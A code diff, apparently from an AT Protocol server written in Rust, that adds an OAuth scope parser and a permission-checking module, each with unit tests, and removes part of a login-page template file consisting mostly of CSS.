accept.insert(positional.to_string()); 220 + } 221 + if let Some(accept_values) = params.get("accept") { 222 + for v in accept_values { 223 + accept.insert(v.to_string()); 224 + } 225 + } 226 + 227 + return ParsedScope::Blob(BlobScope { accept }); 228 + } 229 + 230 + if base.starts_with("rpc") { 231 + let lxm_positional = base.strip_prefix("rpc:").map(|s| s.to_string()); 232 + let lxm = lxm_positional.or_else(|| params.get("lxm").and_then(|v| v.first().cloned())); 233 + let aud = params.get("aud").and_then(|v| v.first().cloned()); 234 + 235 + let is_lxm_wildcard = lxm.as_deref() == Some("*") || lxm.is_none(); 236 + let is_aud_wildcard = aud.as_deref() == Some("*"); 237 + if is_lxm_wildcard && is_aud_wildcard { 238 + return ParsedScope::Unknown(scope.to_string()); 239 + } 240 + 241 + return ParsedScope::Rpc(RpcScope { lxm, aud }); 242 + } 243 + 244 + if let Some(attr_str) = base.strip_prefix("account:") 245 + && let Some(attr) = AccountAttr::parse_str(attr_str) 246 + { 247 + let action = params 248 + .get("action") 249 + .and_then(|v| v.first()) 250 + .and_then(|s| AccountAction::parse_str(s)) 251 + .unwrap_or(AccountAction::Read); 252 + 253 + return ParsedScope::Account(AccountScope { attr, action }); 254 + } 255 + 256 + if let Some(attr_str) = base.strip_prefix("identity:") 257 + && let Some(attr) = IdentityAttr::parse_str(attr_str) 258 + { 259 + return ParsedScope::Identity(IdentityScope { attr }); 260 + } 261 + 262 + if let Some(nsid) = base.strip_prefix("include:") { 263 + let aud = params.get("aud").and_then(|v| v.first().cloned()); 264 + return ParsedScope::Include(IncludeScope { 265 + nsid: nsid.to_string(), 266 + aud, 267 + }); 268 + } 269 + 270 + ParsedScope::Unknown(scope.to_string()) 271 + } 272 + 273 + pub fn parse_scope_string(scope_str: &str) -> Vec<ParsedScope> { 274 + scope_str.split_whitespace().map(parse_scope).collect() 275 + } 276 + 277 + #[cfg(test)] 278 + mod tests { 279 + use super::*; 280 + 281 + #[test] 282 + fn test_parse_atproto() { 283 + assert_eq!(parse_scope("atproto"), ParsedScope::Atproto); 284 + } 285 + 286 + #[test] 287 + fn test_parse_transition_scopes() { 288 + assert_eq!( 289 + parse_scope("transition:generic"), 290 + ParsedScope::TransitionGeneric 291 + ); 292 + assert_eq!( 293 + parse_scope("transition:chat.bsky"), 294 + ParsedScope::TransitionChat 295 + ); 296 + assert_eq!( 297 + parse_scope("transition:email"), 298 + ParsedScope::TransitionEmail 299 + ); 300 + } 301 + 302 + #[test] 303 + fn test_parse_repo_wildcard() { 304 + let scope = parse_scope("repo:*?action=create"); 305 + match scope { 306 + ParsedScope::Repo(r) => { 307 + assert!(r.collection.is_none()); 308 + assert!(r.actions.contains(&RepoAction::Create)); 309 + assert!(!r.actions.contains(&RepoAction::Update)); 310 + } 311 + _ => panic!("Expected Repo scope"), 312 + } 313 + } 314 + 315 + #[test] 316 + fn test_parse_repo_collection() { 317 + let scope = parse_scope("repo:app.bsky.feed.post?action=create&action=delete"); 318 + match scope { 319 + ParsedScope::Repo(r) => { 320 + assert_eq!(r.collection, Some("app.bsky.feed.post".to_string())); 321 + assert!(r.actions.contains(&RepoAction::Create)); 322 + assert!(r.actions.contains(&RepoAction::Delete)); 323 + assert!(!r.actions.contains(&RepoAction::Update)); 324 + } 325 + _ => panic!("Expected Repo scope"), 326 + } 327 + } 328 + 329 + #[test] 330 + fn test_parse_repo_no_actions_means_all() { 331 + let scope = parse_scope("repo:app.bsky.feed.post"); 332 + match scope { 333 + ParsedScope::Repo(r) => { 334 + assert!(r.actions.contains(&RepoAction::Create)); 335 + assert!(r.actions.contains(&RepoAction::Update)); 336 + assert!(r.actions.contains(&RepoAction::Delete)); 337 + } 338 + _ => panic!("Expected Repo scope"), 339 + } 340 + } 341 + 342 + #[test] 343 + fn test_parse_blob_wildcard() { 344 + let scope = parse_scope("blob:*/*"); 345 + match scope { 346 + ParsedScope::Blob(b) => { 347 + assert!(b.accept.contains("*/*")); 348 + assert!(b.matches_mime("image/png")); 349 + assert!(b.matches_mime("video/mp4")); 350 + } 351 + _ => panic!("Expected Blob scope"), 352 + } 353 + } 354 + 355 + #[test] 356 + fn test_parse_blob_specific() { 357 + let scope = parse_scope("blob?accept=image/*&accept=video/*"); 358 + match scope { 359 + ParsedScope::Blob(b) => { 360 + assert!(b.matches_mime("image/png")); 361 + assert!(b.matches_mime("image/jpeg")); 362 + assert!(b.matches_mime("video/mp4")); 363 + assert!(!b.matches_mime("text/plain")); 364 + } 365 + _ => panic!("Expected Blob scope"), 366 + } 367 + } 368 + 369 + #[test] 370 + fn test_parse_rpc() { 371 + let scope = parse_scope("rpc:app.bsky.feed.getTimeline?aud=did:web:api.bsky.app"); 372 + match scope { 373 + ParsedScope::Rpc(r) => { 374 + assert_eq!(r.lxm, Some("app.bsky.feed.getTimeline".to_string())); 375 + assert_eq!(r.aud, Some("did:web:api.bsky.app".to_string())); 376 + } 377 + _ => panic!("Expected Rpc scope"), 378 + } 379 + } 380 + 381 + #[test] 382 + fn test_parse_account() { 383 + let scope = parse_scope("account:email?action=read"); 384 + match scope { 385 + ParsedScope::Account(a) => { 386 + assert_eq!(a.attr, AccountAttr::Email); 387 + assert_eq!(a.action, AccountAction::Read); 388 + } 389 + _ => panic!("Expected Account scope"), 390 + } 391 + 392 + let scope2 = parse_scope("account:repo?action=manage"); 393 + match scope2 { 394 + ParsedScope::Account(a) => { 395 + assert_eq!(a.attr, AccountAttr::Repo); 396 + assert_eq!(a.action, AccountAction::Manage); 397 + } 398 + _ => panic!("Expected Account scope"), 399 + } 400 + } 401 + 402 + #[test] 403 + fn test_parse_scope_string() { 404 + let scopes = parse_scope_string("atproto repo:*?action=create blob:*/*"); 405 + assert_eq!(scopes.len(), 3); 406 + assert_eq!(scopes[0], ParsedScope::Atproto); 407 + match &scopes[1] { 408 + ParsedScope::Repo(_) => {} 409 + _ => panic!("Expected Repo"), 410 + } 411 + match &scopes[2] { 412 + ParsedScope::Blob(_) => {} 413 + _ => panic!("Expected Blob"), 414 + } 415 + } 416 + 417 + #[test] 418 + fn test_parse_include() { 419 + let scope = parse_scope("include:app.bsky.authFullApp?aud=did:web:api.bsky.app"); 420 + match scope { 421 + ParsedScope::Include(i) => { 422 + assert_eq!(i.nsid, "app.bsky.authFullApp"); 423 + assert_eq!(i.aud, Some("did:web:api.bsky.app".to_string())); 424 + } 425 + _ => panic!("Expected Include scope"), 426 + } 427 + 428 + let scope2 = parse_scope("include:com.example.authBasicFeatures"); 429 + match scope2 { 430 + ParsedScope::Include(i) => { 431 + assert_eq!(i.nsid, "com.example.authBasicFeatures"); 432 + assert_eq!(i.aud, None); 433 + } 434 + _ => panic!("Expected Include scope"), 435 + } 436 + } 437 + 438 + #[test] 439 + fn test_parse_identity() { 440 + let scope = parse_scope("identity:handle"); 441 + match scope { 442 + ParsedScope::Identity(i) => { 443 + assert_eq!(i.attr, IdentityAttr::Handle); 444 + } 445 + _ => panic!("Expected Identity scope"), 446 + } 447 + 448 + let scope2 = parse_scope("identity:*"); 449 + match scope2 { 450 + ParsedScope::Identity(i) => { 451 + assert_eq!(i.attr, IdentityAttr::Wildcard); 452 + } 453 + _ => panic!("Expected Identity scope"), 454 + } 455 + } 456 + 457 + #[test] 458 + fn test_parse_account_status() { 459 + let scope = parse_scope("account:status?action=read"); 460 + match scope { 461 + ParsedScope::Account(a) => { 462 + assert_eq!(a.attr, AccountAttr::Status); 463 + assert_eq!(a.action, AccountAction::Read); 464 + } 465 + _ => panic!("Expected Account scope"), 466 + } 467 + } 468 + 469 + #[test] 470 + fn test_rpc_wildcard_aud_forbidden() { 471 + let scope = parse_scope("rpc:*?aud=*"); 472 + assert!(matches!(scope, ParsedScope::Unknown(_))); 473 + 474 + let scope2 = parse_scope("rpc?aud=*"); 475 + assert!(matches!(scope2, ParsedScope::Unknown(_))); 476 + 477 + let scope3 = parse_scope("rpc:app.bsky.feed.getTimeline?aud=*"); 478 + assert!(matches!(scope3, ParsedScope::Rpc(_))); 479 + 480 + let scope4 = parse_scope("rpc:*?aud=did:web:api.bsky.app"); 481 + assert!(matches!(scope4, ParsedScope::Rpc(_))); 482 + } 483 + }
+488
src/oauth/scopes/permissions.rs
···
··· 1 + use super::error::ScopeError; 2 + use super::parser::{ 3 + AccountAction, AccountAttr, BlobScope, IdentityAttr, IdentityScope, ParsedScope, RepoAction, 4 + RepoScope, RpcScope, parse_scope_string, 5 + }; 6 + use std::collections::HashSet; 7 + 8 + #[derive(Debug, Clone)] 9 + pub struct ScopePermissions { 10 + scopes: HashSet<String>, 11 + parsed: Vec<ParsedScope>, 12 + has_atproto: bool, 13 + has_transition_generic: bool, 14 + has_transition_chat: bool, 15 + has_transition_email: bool, 16 + } 17 + 18 + impl ScopePermissions { 19 + pub fn from_scope_string(scope: Option<&str>) -> Self { 20 + let scope_str = scope.unwrap_or("atproto"); 21 + let scopes: HashSet<String> = scope_str 22 + .split_whitespace() 23 + .map(|s| s.to_string()) 24 + .collect(); 25 + 26 + let parsed = parse_scope_string(scope_str); 27 + 28 + let has_atproto = parsed.iter().any(|p| matches!(p, ParsedScope::Atproto)); 29 + let has_transition_generic = parsed 30 + .iter() 31 + .any(|p| matches!(p, ParsedScope::TransitionGeneric)); 32 + let has_transition_chat = parsed 33 + .iter() 34 + .any(|p| matches!(p, ParsedScope::TransitionChat)); 35 + let has_transition_email = parsed 36 + .iter() 37 + .any(|p| matches!(p, ParsedScope::TransitionEmail)); 38 + 39 + Self { 40 + scopes, 41 + parsed, 42 + has_atproto, 43 + has_transition_generic, 44 + has_transition_chat, 45 + has_transition_email, 46 + } 47 + } 48 + 49 + pub fn has_scope(&self, scope: &str) -> bool { 50 + self.scopes.contains(scope) 51 + } 52 + 53 + pub fn scopes(&self) -> &HashSet<String> { 54 + &self.scopes 55 + } 56 + 57 + pub fn has_full_access(&self) -> bool { 58 + self.has_atproto 59 + } 60 + 61 + fn find_repo_scopes(&self) -> impl Iterator<Item = &RepoScope> { 62 + self.parsed.iter().filter_map(|p| { 63 + if let ParsedScope::Repo(r) = p { 64 + Some(r) 65 + } else { 66 + None 67 + } 68 + }) 69 + } 70 + 71 + fn find_blob_scopes(&self) -> impl Iterator<Item = &BlobScope> { 72 + self.parsed.iter().filter_map(|p| { 73 + if let ParsedScope::Blob(b) = p { 74 + Some(b) 75 + } else { 76 + None 77 + } 78 + }) 79 + } 80 + 81 + fn find_rpc_scopes(&self) -> impl Iterator<Item = &RpcScope> { 82 + self.parsed.iter().filter_map(|p| { 83 + if let ParsedScope::Rpc(r) = p { 84 + Some(r) 85 + } else { 86 + None 87 + } 88 + }) 89 + } 90 + 91 + fn find_account_scopes(&self) -> impl Iterator<Item = &super::parser::AccountScope> { 92 + self.parsed.iter().filter_map(|p| { 93 + if let ParsedScope::Account(a) = p { 94 + Some(a) 95 + } else { 96 + None 97 + } 98 + }) 99 + } 100 + 101 + fn find_identity_scopes(&self) -> impl Iterator<Item = &IdentityScope> { 102 + self.parsed.iter().filter_map(|p| { 103 + if let ParsedScope::Identity(i) = p { 104 + Some(i) 105 + } else { 106 + None 107 + } 108 + }) 109 + } 110 + 111 + pub fn assert_repo(&self, action: RepoAction, collection: &str) -> Result<(), ScopeError> { 112 + if self.has_atproto || self.has_transition_generic { 113 + return Ok(()); 114 + } 115 + 116 + for repo_scope in self.find_repo_scopes() { 117 + if !repo_scope.actions.contains(&action) { 118 + continue; 119 + } 120 + 121 + match &repo_scope.collection { 122 + None => return Ok(()), 123 + Some(coll) if coll == collection => return Ok(()), 124 + Some(coll) if coll.ends_with(".*") => { 125 + let prefix = coll.strip_suffix(".*").unwrap(); 126 + if collection.starts_with(prefix) 127 + && collection.chars().nth(prefix.len()) == Some('.') 128 + { 129 + return Ok(()); 130 + } 131 + } 132 + _ => {} 133 + } 134 + } 135 + 136 + Err(ScopeError::InsufficientScope { 137 + required: format!("repo:{}?action={}", collection, action_str(action)), 138 + message: format!( 139 + "Insufficient scope to {} records in {}", 140 + action_str(action), 141 + collection 142 + ), 143 + }) 144 + } 145 + 146 + pub fn assert_blob(&self, mime: &str) -> Result<(), ScopeError> { 147 + if self.has_atproto || self.has_transition_generic { 148 + return Ok(()); 149 + } 150 + 151 + for blob_scope in self.find_blob_scopes() { 152 + if blob_scope.matches_mime(mime) { 153 + return Ok(()); 154 + } 155 + } 156 + 157 + Err(ScopeError::InsufficientScope { 158 + required: format!("blob:{}", mime), 159 + message: format!("Insufficient scope to upload blob with mime type {}", mime), 160 + }) 161 + } 162 + 163 + pub fn assert_rpc(&self, aud: &str, lxm: &str) -> Result<(), ScopeError> { 164 + if self.has_atproto || self.has_transition_generic { 165 + return Ok(()); 166 + } 167 + 168 + if lxm.starts_with("chat.bsky.") && self.has_transition_chat { 169 + return Ok(()); 170 + } 171 + 172 + for rpc_scope in self.find_rpc_scopes() { 173 + let lxm_matches = match &rpc_scope.lxm { 174 + None => true, 175 + Some(scope_lxm) if scope_lxm == lxm => true, 176 + Some(scope_lxm) if scope_lxm.ends_with(".*") => { 177 + let prefix = scope_lxm.strip_suffix(".*").unwrap(); 178 + lxm.starts_with(prefix) && lxm.chars().nth(prefix.len()) == Some('.') 179 + } 180 + _ => false, 181 + }; 182 + 183 + let aud_matches = match &rpc_scope.aud { 184 + None => true, 185 + Some(scope_aud) if scope_aud == "*" => true, 186 + Some(scope_aud) => scope_aud == aud, 187 + }; 188 + 189 + if lxm_matches && aud_matches { 190 + return Ok(()); 191 + } 192 + } 193 + 194 + Err(ScopeError::InsufficientScope { 195 + required: format!("rpc:{}?aud={}", lxm, aud), 196 + message: format!("Insufficient scope to call {} on {}", lxm, aud), 197 + }) 198 + } 199 + 200 + pub fn assert_account( 201 + &self, 202 + attr: AccountAttr, 203 + action: AccountAction, 204 + ) -> Result<(), ScopeError> { 205 + if self.has_atproto || self.has_transition_generic { 206 + return Ok(()); 207 + } 208 + 209 + if attr == AccountAttr::Email && action == AccountAction::Read && self.has_transition_email 210 + { 211 + return Ok(()); 212 + } 213 + 214 + for account_scope in self.find_account_scopes() { 215 + if account_scope.attr == attr && account_scope.action == action { 216 + return Ok(()); 217 + } 218 + if account_scope.attr == attr && account_scope.action == AccountAction::Manage { 219 + return Ok(()); 220 + } 221 + } 222 + 223 + Err(ScopeError::InsufficientScope { 224 + required: format!( 225 + "account:{}?action={}", 226 + attr_str(attr), 227 + action_str_account(action) 228 + ), 229 + message: format!( 230 + "Insufficient scope to {} account {}", 231 + action_str_account(action), 232 + attr_str(attr) 233 + ), 234 + }) 235 + } 236 + 237 + pub fn allows_email_read(&self) -> bool { 238 + self.has_atproto 239 + || self.has_transition_generic 240 + || self.has_transition_email 241 + || self 242 + .find_account_scopes() 243 + .any(|a| a.attr == AccountAttr::Email) 244 + } 245 + 246 + pub fn allows_repo(&self, action: RepoAction, collection: &str) -> bool { 247 + self.assert_repo(action, collection).is_ok() 248 + } 249 + 250 + pub fn allows_blob(&self, mime: &str) -> bool { 251 + self.assert_blob(mime).is_ok() 252 + } 253 + 254 + pub fn allows_rpc(&self, aud: &str, lxm: &str) -> bool { 255 + self.assert_rpc(aud, lxm).is_ok() 256 + } 257 + 258 + pub fn allows_account(&self, attr: AccountAttr, action: AccountAction) -> bool { 259 + self.assert_account(attr, action).is_ok() 260 + } 261 + 262 + pub fn assert_identity(&self, attr: IdentityAttr) -> Result<(), ScopeError> { 263 + if self.has_atproto || self.has_transition_generic { 264 + return Ok(()); 265 + } 266 + 267 + for identity_scope in self.find_identity_scopes() { 268 + if identity_scope.attr == IdentityAttr::Wildcard { 269 + return Ok(()); 270 + } 271 + if identity_scope.attr == attr { 272 + return Ok(()); 273 + } 274 + } 275 + 276 + Err(ScopeError::InsufficientScope { 277 + required: format!("identity:{}", identity_attr_str(attr)), 278 + message: format!( 279 + "Insufficient scope to modify identity {}", 280 + identity_attr_str(attr) 281 + ), 282 + }) 283 + } 284 + 285 + pub fn allows_identity(&self, attr: IdentityAttr) -> bool { 286 + self.assert_identity(attr).is_ok() 287 + } 288 + } 289 + 290 + fn action_str(action: RepoAction) -> &'static str { 291 + match action { 292 + RepoAction::Create => "create", 293 + RepoAction::Update => "update", 294 + RepoAction::Delete => "delete", 295 + } 296 + } 297 + 298 + fn attr_str(attr: AccountAttr) -> &'static str { 299 + match attr { 300 + AccountAttr::Email => "email", 301 + AccountAttr::Handle => "handle", 302 + AccountAttr::Repo => "repo", 303 + AccountAttr::Status => "status", 304 + } 305 + } 306 + 307 + fn identity_attr_str(attr: IdentityAttr) -> &'static str { 308 + match attr { 309 + IdentityAttr::Handle => "handle", 310 + IdentityAttr::Wildcard => "*", 311 + } 312 + } 313 + 314 + fn action_str_account(action: AccountAction) -> &'static str { 315 + match action { 316 + AccountAction::Read => "read", 317 + AccountAction::Manage => "manage", 318 + } 319 + } 320 + 321 + impl Default for ScopePermissions { 322 + fn default() -> Self { 323 + Self::from_scope_string(Some("atproto")) 324 + } 325 + } 326 + 327 + #[cfg(test)] 328 + mod tests { 329 + use super::*; 330 + 331 + #[test] 332 + fn test_atproto_scope_allows_everything() { 333 + let perms = ScopePermissions::from_scope_string(Some("atproto")); 334 + assert!(perms.has_full_access()); 335 + assert!(perms.allows_repo(RepoAction::Create, "app.bsky.feed.post")); 336 + assert!(perms.allows_blob("image/png")); 337 + assert!(perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getTimeline")); 338 + assert!(perms.allows_account(AccountAttr::Email, AccountAction::Manage)); 339 + } 340 + 341 + #[test] 342 + fn test_transition_generic_allows_everything() { 343 + let perms = ScopePermissions::from_scope_string(Some("transition:generic")); 344 + assert!(perms.allows_repo(RepoAction::Create, "app.bsky.feed.post")); 345 + assert!(perms.allows_blob("image/png")); 346 + } 347 + 348 + #[test] 349 + fn test_transition_chat_only_allows_chat() { 350 + let perms = ScopePermissions::from_scope_string(Some("transition:chat.bsky")); 351 + assert!(!perms.allows_repo(RepoAction::Create, "app.bsky.feed.post")); 352 + assert!(perms.allows_rpc("did:web:api.bsky.app", "chat.bsky.convo.getMessages")); 353 + assert!(!perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getTimeline")); 354 + } 355 + 356 + #[test] 357 + fn test_empty_scope_defaults_to_atproto() { 358 + let perms = ScopePermissions::from_scope_string(None); 359 + assert!(perms.has_full_access()); 360 + } 361 + 362 + #[test] 363 + fn test_multiple_scopes() { 364 + let perms = ScopePermissions::from_scope_string(Some("atproto transition:chat.bsky")); 365 + assert!(perms.has_scope("atproto")); 366 + assert!(perms.has_scope("transition:chat.bsky")); 367 + assert!(!perms.has_scope("transition:generic")); 368 + } 369 + 370 + #[test] 371 + fn test_transition_email_allows_email_read() { 372 + let perms = ScopePermissions::from_scope_string(Some("transition:email")); 373 + assert!(perms.allows_email_read()); 374 + assert!(perms.allows_account(AccountAttr::Email, AccountAction::Read)); 375 + assert!(!perms.allows_account(AccountAttr::Email, AccountAction::Manage)); 376 + assert!(!perms.allows_repo(RepoAction::Create, "app.bsky.feed.post")); 377 + } 378 + 379 + #[test] 380 + fn test_granular_repo_wildcard() { 381 + let perms = 382 + ScopePermissions::from_scope_string(Some("atproto repo:*?action=create blob:*/*")); 383 + assert!(perms.allows_repo(RepoAction::Create, "app.bsky.feed.post")); 384 + assert!(perms.allows_repo(RepoAction::Create, "any.collection")); 385 + assert!(perms.allows_blob("image/png")); 386 + } 387 + 388 + #[test] 389 + fn test_granular_repo_collection_specific() { 390 + let perms = ScopePermissions::from_scope_string(Some( 391 + "repo:app.bsky.feed.post?action=create&action=delete", 392 + )); 393 + assert!(perms.allows_repo(RepoAction::Create, "app.bsky.feed.post")); 394 + assert!(perms.allows_repo(RepoAction::Delete, "app.bsky.feed.post")); 395 + assert!(!perms.allows_repo(RepoAction::Update, "app.bsky.feed.post")); 396 + assert!(!perms.allows_repo(RepoAction::Create, "app.bsky.feed.like")); 397 + } 398 + 399 + #[test] 400 + fn test_granular_blob_specific_mime() { 401 + let perms = ScopePermissions::from_scope_string(Some("blob?accept=image/*&accept=video/*")); 402 + assert!(perms.allows_blob("image/png")); 403 + assert!(perms.allows_blob("image/jpeg")); 404 + assert!(perms.allows_blob("video/mp4")); 405 + assert!(!perms.allows_blob("text/plain")); 406 + assert!(!perms.allows_blob("application/json")); 407 + } 408 + 409 + #[test] 410 + fn test_granular_rpc() { 411 + let perms = ScopePermissions::from_scope_string(Some( 412 + "rpc:app.bsky.feed.getTimeline?aud=did:web:api.bsky.app", 413 + )); 414 + assert!(perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getTimeline")); 415 + assert!(!perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getAuthorFeed")); 416 + assert!(!perms.allows_rpc("did:web:other.service", "app.bsky.feed.getTimeline")); 417 + } 418 + 419 + #[test] 420 + fn test_granular_rpc_wildcard_aud() { 421 + let perms = 422 + ScopePermissions::from_scope_string(Some("rpc:app.bsky.feed.getTimeline?aud=*")); 423 + assert!(perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getTimeline")); 424 + assert!(perms.allows_rpc("did:web:any.service", "app.bsky.feed.getTimeline")); 425 + assert!(!perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getAuthorFeed")); 426 + } 427 + 428 + #[test] 429 + fn test_granular_account() { 430 + let perms = ScopePermissions::from_scope_string(Some("account:email?action=read")); 431 + assert!(perms.allows_account(AccountAttr::Email, AccountAction::Read)); 432 + assert!(!perms.allows_account(AccountAttr::Email, AccountAction::Manage)); 433 + assert!(!perms.allows_account(AccountAttr::Handle, AccountAction::Read)); 434 + 435 + let perms2 = ScopePermissions::from_scope_string(Some("account:repo?action=manage")); 436 + assert!(perms2.allows_account(AccountAttr::Repo, AccountAction::Manage)); 437 + assert!(perms2.allows_account(AccountAttr::Repo, AccountAction::Read)); 438 + } 439 + 440 + #[test] 441 + fn test_granular_scopes_without_atproto() { 442 + let perms = ScopePermissions::from_scope_string(Some("repo:*?action=create")); 443 + assert!(!perms.has_full_access()); 444 + assert!(perms.allows_repo(RepoAction::Create, "any.collection")); 445 + assert!(!perms.allows_repo(RepoAction::Update, "any.collection")); 446 + assert!(!perms.allows_repo(RepoAction::Delete, "any.collection")); 447 + } 448 + 449 + #[test] 450 + fn test_pdsls_style_scopes() { 451 + let perms = ScopePermissions::from_scope_string(Some( 452 + "atproto repo:*?action=create repo:*?action=update repo:*?action=delete blob:*/*", 453 + )); 454 + assert!(perms.allows_repo(RepoAction::Create, "any.collection")); 455 + assert!(perms.allows_repo(RepoAction::Update, "any.collection")); 456 + assert!(perms.allows_repo(RepoAction::Delete, "any.collection")); 457 + assert!(perms.allows_blob("image/png")); 458 + assert!(perms.allows_blob("video/mp4")); 459 + } 460 + 461 + #[test] 462 + fn test_identity_scope_handle() { 463 + let perms = ScopePermissions::from_scope_string(Some("identity:handle")); 464 + assert!(perms.allows_identity(IdentityAttr::Handle)); 465 + assert!(!perms.allows_identity(IdentityAttr::Wildcard)); 466 + } 467 + 468 + #[test] 469 + fn test_identity_scope_wildcard() { 470 + let perms = ScopePermissions::from_scope_string(Some("identity:*")); 471 + assert!(perms.allows_identity(IdentityAttr::Handle)); 472 + assert!(perms.allows_identity(IdentityAttr::Wildcard)); 473 + } 474 + 475 + #[test] 476 + fn test_identity_scope_with_atproto() { 477 + let perms = ScopePermissions::from_scope_string(Some("atproto")); 478 + assert!(perms.allows_identity(IdentityAttr::Handle)); 479 + assert!(perms.allows_identity(IdentityAttr::Wildcard)); 480 + } 481 + 482 + #[test] 483 + fn test_account_status_scope() { 484 + let perms = ScopePermissions::from_scope_string(Some("account:status?action=read")); 485 + assert!(perms.allows_account(AccountAttr::Status, AccountAction::Read)); 486 + assert!(!perms.allows_account(AccountAttr::Status, AccountAction::Manage)); 487 + } 488 + }
-595
src/oauth/templates.rs
··· 1 - use chrono::{DateTime, Utc}; 2 - 3 - fn format_scope_for_display(scope: Option<&str>) -> String { 4 - let scope = scope.unwrap_or(""); 5 - if scope.is_empty() || scope.contains("atproto") || scope.contains("transition:generic") { 6 - return "access your account".to_string(); 7 - } 8 - let parts: Vec<&str> = scope.split_whitespace().collect(); 9 - let friendly: Vec<&str> = parts 10 - .iter() 11 - .filter_map(|s| { 12 - match *s { 13 - "atproto" | "transition:generic" | "transition:chat.bsky" => None, 14 - "read" => Some("read your data"), 15 - "write" => Some("write data"), 16 - other => Some(other), 17 - } 18 - }) 19 - .collect(); 20 - if friendly.is_empty() { 21 - "access your account".to_string() 22 - } else { 23 - friendly.join(", ") 24 - } 25 - } 26 - 27 - fn base_styles() -> &'static str { 28 - r#" 29 - :root { 30 - --bg-primary: #fafafa; 31 - --bg-secondary: #f9f9f9; 32 - --bg-card: #ffffff; 33 - --bg-input: #ffffff; 34 - --text-primary: #333333; 35 - --text-secondary: #666666; 36 - --text-muted: #999999; 37 - --border-color: #dddddd; 38 - --border-color-light: #cccccc; 39 - --accent: #0066cc; 40 - --accent-hover: #0052a3; 41 - --success-bg: #dfd; 42 - --success-border: #8c8; 43 - --success-text: #060; 44 - --error-bg: #fee; 45 - --error-border: #fcc; 46 - --error-text: #c00; 47 - } 48 - @media (prefers-color-scheme: dark) { 49 - :root { 50 - --bg-primary: #1a1a1a; 51 - --bg-secondary: #242424; 52 - --bg-card: #2a2a2a; 53 - --bg-input: #333333; 54 - --text-primary: #e0e0e0; 55 - --text-secondary: #a0a0a0; 56 - --text-muted: #707070; 57 - --border-color: #404040; 58 - --border-color-light: #505050; 59 - --accent: #4da6ff; 60 - --accent-hover: #7abbff; 61 - --success-bg: #1a3d1a; 62 - --success-border: #2d5a2d; 63 - --success-text: #7bc67b; 64 - --error-bg: #3d1a1a; 65 - --error-border: #5a2d2d; 66 - --error-text: #ff7b7b; 67 - } 68 - } 69 - * { 70 - box-sizing: border-box; 71 - margin: 0; 72 - padding: 0; 73 - } 74 - body { 75 - font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; 76 - background: var(--bg-primary); 77 - color: var(--text-primary); 78 - min-height: 100vh; 79 - line-height: 1.5; 80 - } 81 - .container { 82 - max-width: 400px; 83 - margin: 4rem auto; 84 - padding: 2rem; 85 - } 86 - h1 { 87 - margin: 0 0 0.5rem 0; 88 - font-weight: 600; 89 - } 90 - .subtitle { 91 - color: var(--text-secondary); 92 - margin: 0 0 2rem 0; 93 - } 94 - .subtitle strong { 95 - color: var(--text-primary); 96 - } 97 - .client-info { 98 - background: var(--bg-secondary); 99 - border: 1px solid var(--border-color); 100 - border-radius: 8px; 101 - padding: 1rem; 102 - margin-bottom: 1.5rem; 103 - } 104 - .client-info .client-name { 105 - font-weight: 500; 106 - color: var(--text-primary); 107 - display: block; 108 - margin-bottom: 0.25rem; 109 - } 110 - .client-info .scope { 111 - color: var(--text-secondary); 112 - font-size: 0.875rem; 113 - } 114 - .error-banner { 115 - background: var(--error-bg); 116 - border: 1px solid var(--error-border); 117 - color: var(--error-text); 118 - border-radius: 4px; 119 - padding: 0.75rem; 120 - margin-bottom: 1rem; 121 - } 122 - .form-group { 123 - margin-bottom: 1rem; 124 - } 125 - label { 126 - display: block; 127 - font-size: 0.875rem; 128 - font-weight: 500; 129 - margin-bottom: 0.25rem; 130 - } 131 - input[type="text"], 132 - input[type="email"], 133 - input[type="password"] { 134 - width: 100%; 135 - padding: 0.75rem; 136 - border: 1px solid var(--border-color-light); 137 - border-radius: 4px; 138 - font-size: 1rem; 139 - color: var(--text-primary); 140 - background: var(--bg-input); 141 - } 142 - input[type="text"]:focus, 143 - input[type="email"]:focus, 144 - input[type="password"]:focus { 145 - outline: none; 146 - border-color: var(--accent); 147 - } 148 - input[type="text"]::placeholder, 149 - input[type="email"]::placeholder, 150 - input[type="password"]::placeholder { 151 - color: var(--text-muted); 152 - } 153 - .checkbox-group { 154 - display: flex; 155 - align-items: center; 156 - gap: 0.5rem; 157 - margin-bottom: 1.5rem; 158 - } 159 - .checkbox-group input[type="checkbox"] { 160 - width: 1rem; 161 - height: 1rem; 162 - accent-color: var(--accent); 163 - } 164 - .checkbox-group label { 165 - margin-bottom: 0; 166 - font-weight: normal; 167 - color: var(--text-secondary); 168 - cursor: pointer; 169 - } 170 - .buttons { 171 - display: flex; 172 - gap: 0.75rem; 173 - } 174 - .btn { 175 - flex: 1; 176 - padding: 0.75rem; 177 - border-radius: 4px; 178 - font-size: 1rem; 179 - cursor: pointer; 180 - border: none; 181 - text-align: center; 182 - text-decoration: none; 183 - } 184 - .btn-primary { 185 - background: var(--accent); 186 - color: white; 187 - } 188 - .btn-primary:hover { 189 - background: var(--accent-hover); 190 - } 191 - .btn-primary:disabled { 192 - opacity: 0.6; 193 - cursor: not-allowed; 194 - } 195 - .btn-secondary { 196 - background: transparent; 197 - color: var(--accent); 198 - border: 1px solid var(--accent); 199 - } 200 - .btn-secondary:hover { 201 - background: var(--accent); 202 - color: white; 203 - } 204 - .footer { 205 - text-align: center; 206 - margin-top: 1.5rem; 207 - font-size: 0.75rem; 208 - color: var(--text-muted); 209 - } 210 - .accounts { 211 - display: flex; 212 - flex-direction: column; 213 - gap: 0.5rem; 214 - margin-bottom: 1rem; 215 - } 216 - .account-item { 217 - display: flex; 218 - align-items: center; 219 - justify-content: space-between; 220 - width: 100%; 221 - padding: 1rem; 222 - background: var(--bg-card); 223 - border: 1px solid var(--border-color); 224 - border-radius: 8px; 225 - cursor: pointer; 226 - transition: border-color 0.15s, box-shadow 0.15s; 227 - text-align: left; 228 - } 229 - .account-item:hover { 230 - border-color: var(--accent); 231 - box-shadow: 0 2px 8px rgba(77, 166, 255, 0.15); 232 - } 233 - .account-info { 234 - display: flex; 235 - flex-direction: column; 236 - gap: 0.25rem; 237 - flex: 1; 238 - min-width: 0; 239 - } 240 - 